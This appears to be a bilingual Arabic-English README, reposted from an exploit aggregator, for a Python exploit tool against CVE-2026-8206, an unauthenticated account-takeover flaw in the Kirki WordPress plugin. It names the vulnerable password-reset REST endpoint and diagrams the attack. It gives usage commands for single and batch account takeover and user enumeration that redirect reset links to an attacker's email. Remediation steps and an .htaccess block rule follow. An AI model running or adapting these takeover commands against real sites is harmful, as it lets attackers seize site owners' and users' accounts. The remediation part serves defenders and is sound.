Share
## https://sploitus.com/exploit?id=64C0A7A5-05B6-588C-ACED-A80350092137
# ๐ก๏ธ AMN SECURITY ๐ก๏ธ






---
### ๐ Connect with AMN SECURITY
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# ๐ธ๐ฆ CVE-2026-8206 - ุงุณุชููุงุก ุนูู ุญุณุงุจุงุช ููุฑุฏุจุฑูุณ ุนุจุฑ ุฅุถุงูุฉ Kirki
## ๐ ุงูู
ูุฎุต ุงูุชูููุฐู
**CVE-2026-8206** ูู ุซุบุฑุฉ ุฃู
ููุฉ ุฎุทูุฑุฉ (ุชุตููู: **9.8 CRITICAL**) ุชูุฌุฏ ูู ุฅุถุงูุฉ **Kirki** ููุธุงู
ุฅุฏุงุฑุฉ ุงูู
ุญุชูู **WordPress**. ุชุณู
ุญ ูุฐู ุงูุซุบุฑุฉ ููู
ูุงุฌู
ูู ุบูุฑ ุงูู
ุณุฌููู (Unauthenticated attackers) ุจุงูุงุณุชููุงุก ุงููุงู
ู ุนูู ุญุณุงุจุงุช ุงูู
ุณุชุฎุฏู
ูู ุงูู
ุณุฌููู ูู ุงูู
ููุน ุงูู
ุณุชูุฏู ุฏูู ุงูุญุงุฌุฉ ุฅูู ุฃู ุตูุงุญูุงุช ุฃู ุชูุซูู ู
ุณุจู.
ุชุณุชุบู ุงูุซุบุฑุฉ ููุทุฉ ููุงูุฉ REST API ุงูุฎุงุตุฉ ุจู **CompLibFormHandler**ุ ุญูุซ ูู
ูู ููู
ูุงุฌู
ุฅุนุงุฏุฉ ุชูุฌูู ุฑุณุงุฆู ุฅุนุงุฏุฉ ุชุนููู ููู
ุฉ ุงูู
ุฑูุฑ (Password Reset Emails) ุฅูู ุนููุงู ุจุฑูุฏ ุฅููุชุฑููู ูุชุญูู
ุจู ุงูู
ูุงุฌู
ุ ู
ู
ุง ูู
ููู ู
ู ุชุนููู ููู
ุฉ ู
ุฑูุฑ ุฌุฏูุฏุฉ ูุงูุฏุฎูู ุฅูู ุงูุญุณุงุจ ุจุงููุงู
ู.
| ุงููููู | ุงูููู
ุฉ |
|--------|--------|
| CVE ID | CVE-2026-8206 |
| CVSS Score | 9.8 (Critical) |
| ุงูู
ุชุฌู | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ุงูู
ูุชุฌ | WordPress Kirki Plugin |
| ููุน ุงูุซุบุฑุฉ | Unauthenticated Account Takeover |
| ุงูุชุณูุณู ุงููุฑู
ู | CompLibFormHandler REST API |
| ุงูุชุฃุซูุฑ | ุงุณุชููุงุก ูุงู
ู ุนูู ุงูุญุณุงุจ |
---
## ๐ ุชูุงุตูู ุงูุซุบุฑุฉ
ุชุณุชุบู ูุฐู ุงูุซุบุฑุฉ ุขููุฉ ุฅุนุงุฏุฉ ุชุนููู ููู
ุฉ ุงูู
ุฑูุฑ ูู ุฅุถุงูุฉ Kirki. ุชููู
ุงูุฅุถุงูุฉ ุจุชุนุฑูุถ ููุทุฉ ููุงูุฉ REST API ุชุณู
ุญ ุจุฅุฑุณุงู ุทูุจุงุช ุฅุนุงุฏุฉ ุชุนููู ููู
ุฉ ุงูู
ุฑูุฑ. ูุธุฑูุง ูุนุฏู
ูุฌูุฏ ุงูุชุญูู ุงูู
ูุงุณุจ ู
ู ุงูู
ูููุฉ ุฃู ุงูู
ุตุงุฏูุฉ ุนูู ูุฐู ุงูููุทุฉุ ูู
ูู ููู
ูุงุฌู
:
1. **ุชุญุฏูุฏ ุฃู ุงุณู
ู
ุณุชุฎุฏู
ู
ุณุฌู** ูู ู
ููุน WordPress ุงูู
ุณุชูุฏู
2. **ุฅุฑุณุงู ุทูุจ ุฅุนุงุฏุฉ ุชุนููู ููู
ุฉ ุงูู
ุฑูุฑ** ุฅูู ููุทุฉ ููุงูุฉ REST API ุงูุถุนููุฉ
3. **ุชูุฌูู ุฑุงุจุท ุฅุนุงุฏุฉ ุงูุชุนููู** ุฅูู ุนููุงู ุจุฑูุฏ ุฅููุชุฑููู ูุชุญูู
ุจู ุงูู
ูุงุฌู
4. **ุงุณุชูุงู
ุฑุงุจุท ุฅุนุงุฏุฉ ุงูุชุนููู** ูุชุนููู ููู
ุฉ ู
ุฑูุฑ ุฌุฏูุฏุฉ
5. **ุชุณุฌูู ุงูุฏุฎูู ุฅูู ุงูุญุณุงุจ** ุจุงุณู
ุงูู
ุณุชุฎุฏู
ุงูู
ุฎุชุฑู
### ุงูู
ูููุงุช ุงูู
ุชุฃุซุฑุฉ
- `KirkiComponentLibrary` โ ุงูู
ูููุฉ ุงูุฑุฆูุณูุฉ
- `/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password` โ ููุทุฉ ููุงูุฉ REST API
- ุขููุฉ ุฅุนุงุฏุฉ ุชุนููู ููู
ุฉ ุงูู
ุฑูุฑ ูู Kirki
---
## โ๏ธ ุขููุฉ ุงููุฌูู
```
โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โ Attacker โ โ WordPress Site โ โ Attacker Email โ
โ (Unauth) โ โ (Kirki Plugin) โ โ โ
โโโโโโโโโโฌโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ
โ โ โ
โ 1. Scan for Kirki โ โ
โ forms & extract nonceโ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 2. POST reset req โ โ
โ (username + attacker โ โ
โ email) โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 3. Server processes โ โ
โ request without auth โ โ
โ verification โ โ
โ โ โ
โ 4. Reset link sent โ โ
โ to attacker email โโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ โ
โ 5. Click reset link โ โ
โ & set new password โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 6. Log in as victim โ โ
โ account takeover โ โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
```
---
## ๐ ๏ธ ุงุณุชุฎุฏุงู
ุงูุฃุฏุงุฉ
### ุงูู
ุชุทูุจุงุช
```bash
pip install requests beautifulsoup4
```
### ุงูุงุณุชููุงุก ุนูู ุญุณุงุจ ูุงุญุฏ
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com
```
### ุงุณุชูุฏุงู ุญุณุงุจุงุช ู
ุชุนุฏุฏุฉ
```bash
python3 CVE-2026-8206.py https://target-site.com -e attacker@gmail.com --batch users.txt
```
### ุชุนุฏุงุฏ ุงูู
ุณุชุฎุฏู
ูู
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com --enumerate
```
### ุฅุธูุงุฑ ุงูู
ุฎุฑุฌุงุช ุงูุชูุตูููุฉ
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com -v
```
### ุงูุฎูุงุฑุงุช ุงูู
ุชุงุญุฉ
| ุงูุฎูุงุฑ | ุงููุตู |
|--------|-------|
| `target` | ุฑุงุจุท ุงูู
ููุน ุงูู
ุณุชูุฏู (ู
ุทููุจ) |
| `-u, --username` | ุงุณู
ุงูู
ุณุชุฎุฏู
ุงูู
ุณุชูุฏู ููุงุณุชููุงุก (ู
ุทููุจ) |
| `-e, --email` | ุงูุจุฑูุฏ ุงูุฅููุชุฑููู ููู
ูุงุฌู
ูุงุณุชูุงู
ุฑุงุจุท ุฅุนุงุฏุฉ ุงูุชุนููู (ู
ุทููุจ) |
| `-v, --verbose` | ุฅุธูุงุฑ ุงูู
ุฎุฑุฌุงุช ุงูุชูุตูููุฉ |
| `--enumerate` | ุชุนุฏุงุฏ ู
ุณุชุฎุฏู
ู WordPress |
| `--batch FILE` | ุงุณุชููุงุก ุฌู
ุงุนู ู
ู ู
ูู |
| `--delay SECONDS` | ุชุฃุฎูุฑ ุจูู ุงูุทูุจุงุช (ุงูุงูุชุฑุงุถู: 1 ุซุงููุฉ) |
---
## ๐ก๏ธ ุงูุฅุฌุฑุงุกุงุช ุงูุนูุงุฌูุฉ
ูุญู
ุงูุฉ ู
ููุนู ู
ู ูุฐู ุงูุซุบุฑุฉุ ูููุตู ุจุงุชุฎุงุฐ ุงูุฅุฌุฑุงุกุงุช ุงูุชุงููุฉ:
1. **ุชุญุฏูุซ ุฅุถุงูุฉ Kirki** ุฅูู ุฃุญุฏุซ ุฅุตุฏุงุฑ ููุฑุงู
2. **ุชุนุทูู ุงูุฅุถุงูุฉ** ู
ุคูุชุงู ุฅุฐุง ูู
ูุชููุฑ ุชุญุฏูุซ
3. **ู
ุฑุงุฌุนุฉ ุณุฌูุงุช WordPress** ูููุดู ุนู ุฃู ูุดุงุท ู
ุดุจูู
4. **ุชุบููุฑ ููู
ุงุช ู
ุฑูุฑ ุฌู
ูุน ุงูู
ุณุชุฎุฏู
ูู** ูุฅุฌุฑุงุก ุงุญุชุฑุงุฒู
5. **ุชูุนูู ุงูู
ุตุงุฏูุฉ ู
ุชุนุฏุฏุฉ ุงูุนูุงู
ู (MFA)** ูุฌู
ูุน ุงูุญุณุงุจุงุช ุงูุฅุฏุงุฑูุฉ
6. **ุงุณุชุฎุฏุงู
ุฌุฏุงุฑ ุญู
ุงูุฉ WordPress** (ู
ุซู Wordfence) ูู
ูุน ุงูุทูุจุงุช ุงูุถุงุฑุฉ
7. **ู
ุฑุงูุจุฉ ููุงุท ููุงูุฉ REST API** ุจุญุซุงู ุนู ุฃู ูุดุงุท ุบูุฑ ู
ุตุฑุญ ุจู
### ุงูุฅุฌุฑุงุก ุงูููุงุฆู ุนุจุฑ `.htaccess`
```apache
RewriteEngine On
RewriteCond %{REQUEST_URI} ^.*KirkiComponentLibrary.* [NC]
RewriteCond %{REQUEST_METHOD} POST
RewriteRule ^.*$ - [F,L]
```
---
## โ ๏ธ ุฅุฎูุงุก ุงูู
ุณุคูููุฉ
ูุฐู ุงูุฃุฏุงุฉ ู
ูุฏู
ุฉ ููุฃุบุฑุงุถ ุงูุชุนููู
ูุฉ ูุงูุจุญุซูุฉ ููุท. ุงุณุชุฎุฏุงู
ูุฐู ุงูุฃุฏุงุฉ ูุงุณุชูุฏุงู ุฃูุธู
ุฉ ุจุฏูู ุฅุฐู ุตุฑูุญ ูู ุบูุฑ ูุงูููู ููุนุชุจุฑ ุงูุชูุงูุงู ููููุงููู ุงูู
ุญููุฉ ูุงูุฏูููุฉ. ุฃูุช ุงูู
ุณุคูู ุงููุญูุฏ ุนู ุงุณุชุฎุฏุงู
ู ููุฐู ุงูุฃุฏุงุฉ. ุงูู
ุณุชุฎุฏู
ูุชุญู
ู ูุงู
ู ุงูู
ุณุคูููุฉ ุนู ุฃู ุนูุงูุจ ูุงููููุฉ ุฃู ุฃุถุฑุงุฑ ูุงุชุฌุฉ ุนู ุณูุก ุงูุงุณุชุฎุฏุงู
.
---
---
# ๐ฌ๐ง CVE-2026-8206 - Kirki WordPress Plugin Unauthenticated Account Takeover
## ๐ Executive Summary
**CVE-2026-8206** is a critical security vulnerability (CVSS: **9.8 CRITICAL**) found in the **Kirki WordPress Plugin**. This flaw allows **unauthenticated attackers** to perform a complete **account takeover** of any registered WordPress user without requiring any prior authentication or privileges.
The vulnerability exists in the **CompLibFormHandler REST API endpoint**, where attackers can manipulate password reset requests to redirect password reset emails to attacker-controlled email addresses. Once the reset link is intercepted, the attacker can set a new password and gain full access to the compromised account.
| Field | Value |
|-------|-------|
| CVE ID | CVE-2026-8206 |
| CVSS Score | 9.8 (Critical) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Product | WordPress Kirki Plugin |
| Vulnerability Type | Unauthenticated Account Takeover |
| Attack Vector | CompLibFormHandler REST API |
| Impact | Complete Account Takeover |
---
## ๐ Vulnerability Details
This vulnerability exploits the password reset mechanism within the Kirki plugin. The plugin exposes a REST API endpoint that processes password reset requests. Due to insufficient authorization checks and lack of ownership verification on this endpoint, an attacker can:
1. **Identify any registered username** on the target WordPress site
2. **Craft a password reset request** to the vulnerable REST API endpoint
3. **Redirect the reset link** to an email address controlled by the attacker
4. **Receive the reset link** and set a new password for the victim's account
5. **Log in** as the compromised user
### Affected Components
- `KirkiComponentLibrary` โ Core component
- `/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password` โ REST API endpoint
- Kirki password reset mechanism
---
## โ๏ธ Attack Flow
```
โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โ Attacker โ โ WordPress Site โ โ Attacker Email โ
โ (Unauth) โ โ (Kirki Plugin) โ โ โ
โโโโโโโโโโฌโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ
โ โ โ
โ 1. Scan for Kirki โ โ
โ forms & extract nonceโ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 2. POST reset req โ โ
โ (username + attacker โ โ
โ email) โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 3. Server processes โ โ
โ request without auth โ โ
โ verification โ โ
โ โ โ
โ 4. Reset link sent โ โ
โ to attacker email โโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ โ
โ 5. Click reset link โ โ
โ & set new password โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 6. Log in as victim โ โ
โ account takeover โ โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
```
---
## ๐ ๏ธ Usage
### Requirements
```bash
pip install requests beautifulsoup4
```
### Single Account Takeover
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com
```
### Batch Account Takeover
```bash
python3 CVE-2026-8206.py https://target-site.com -e attacker@gmail.com --batch users.txt
```
### Enumerate Users
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com --enumerate
```
### Verbose Output
```bash
python3 CVE-2026-8206.py https://target-site.com -u admin -e attacker@gmail.com -v
```
### Options
| Option | Description |
|--------|-------------|
| `target` | Target WordPress URL (required) |
| `-u, --username` | Target username for takeover (required) |
| `-e, --email` | Attacker email to receive reset link (required) |
| `-v, --verbose` | Enable verbose output |
| `--enumerate` | Enumerate WordPress users |
| `--batch FILE` | Batch exploit from file (one username per line) |
| `--delay SECONDS` | Delay between requests (default: 1) |
---
## ๐ก๏ธ Remediation
To protect your WordPress site from this vulnerability, follow these steps:
1. **Update Kirki Plugin** to the latest patched version immediately
2. **Disable the plugin** temporarily if no patch is available
3. **Review WordPress logs** for any suspicious activity
4. **Reset passwords for all users** as a precautionary measure
5. **Enable Multi-Factor Authentication (MFA)** for all administrative accounts
6. **Deploy a WordPress firewall** (e.g., Wordfence) to block malicious requests
7. **Monitor REST API endpoints** for unauthorized access attempts
### `.htaccess` Mitigation
```apache
RewriteEngine On
RewriteCond %{REQUEST_URI} ^.*KirkiComponentLibrary.* [NC]
RewriteCond %{REQUEST_METHOD} POST
RewriteRule ^.*$ - [F,L]
```
---
## โ ๏ธ Disclaimer
This tool is provided for **educational and authorized security testing purposes only**. Using this tool against systems without explicit permission is illegal and constitutes a violation of local and international laws. You are solely responsible for your use of this tool. The author assumes no liability for any misuse or damages caused by this tool.
---
### AMN SECURITY Research Team
*Securing the digital world, one vulnerability at a time.*
---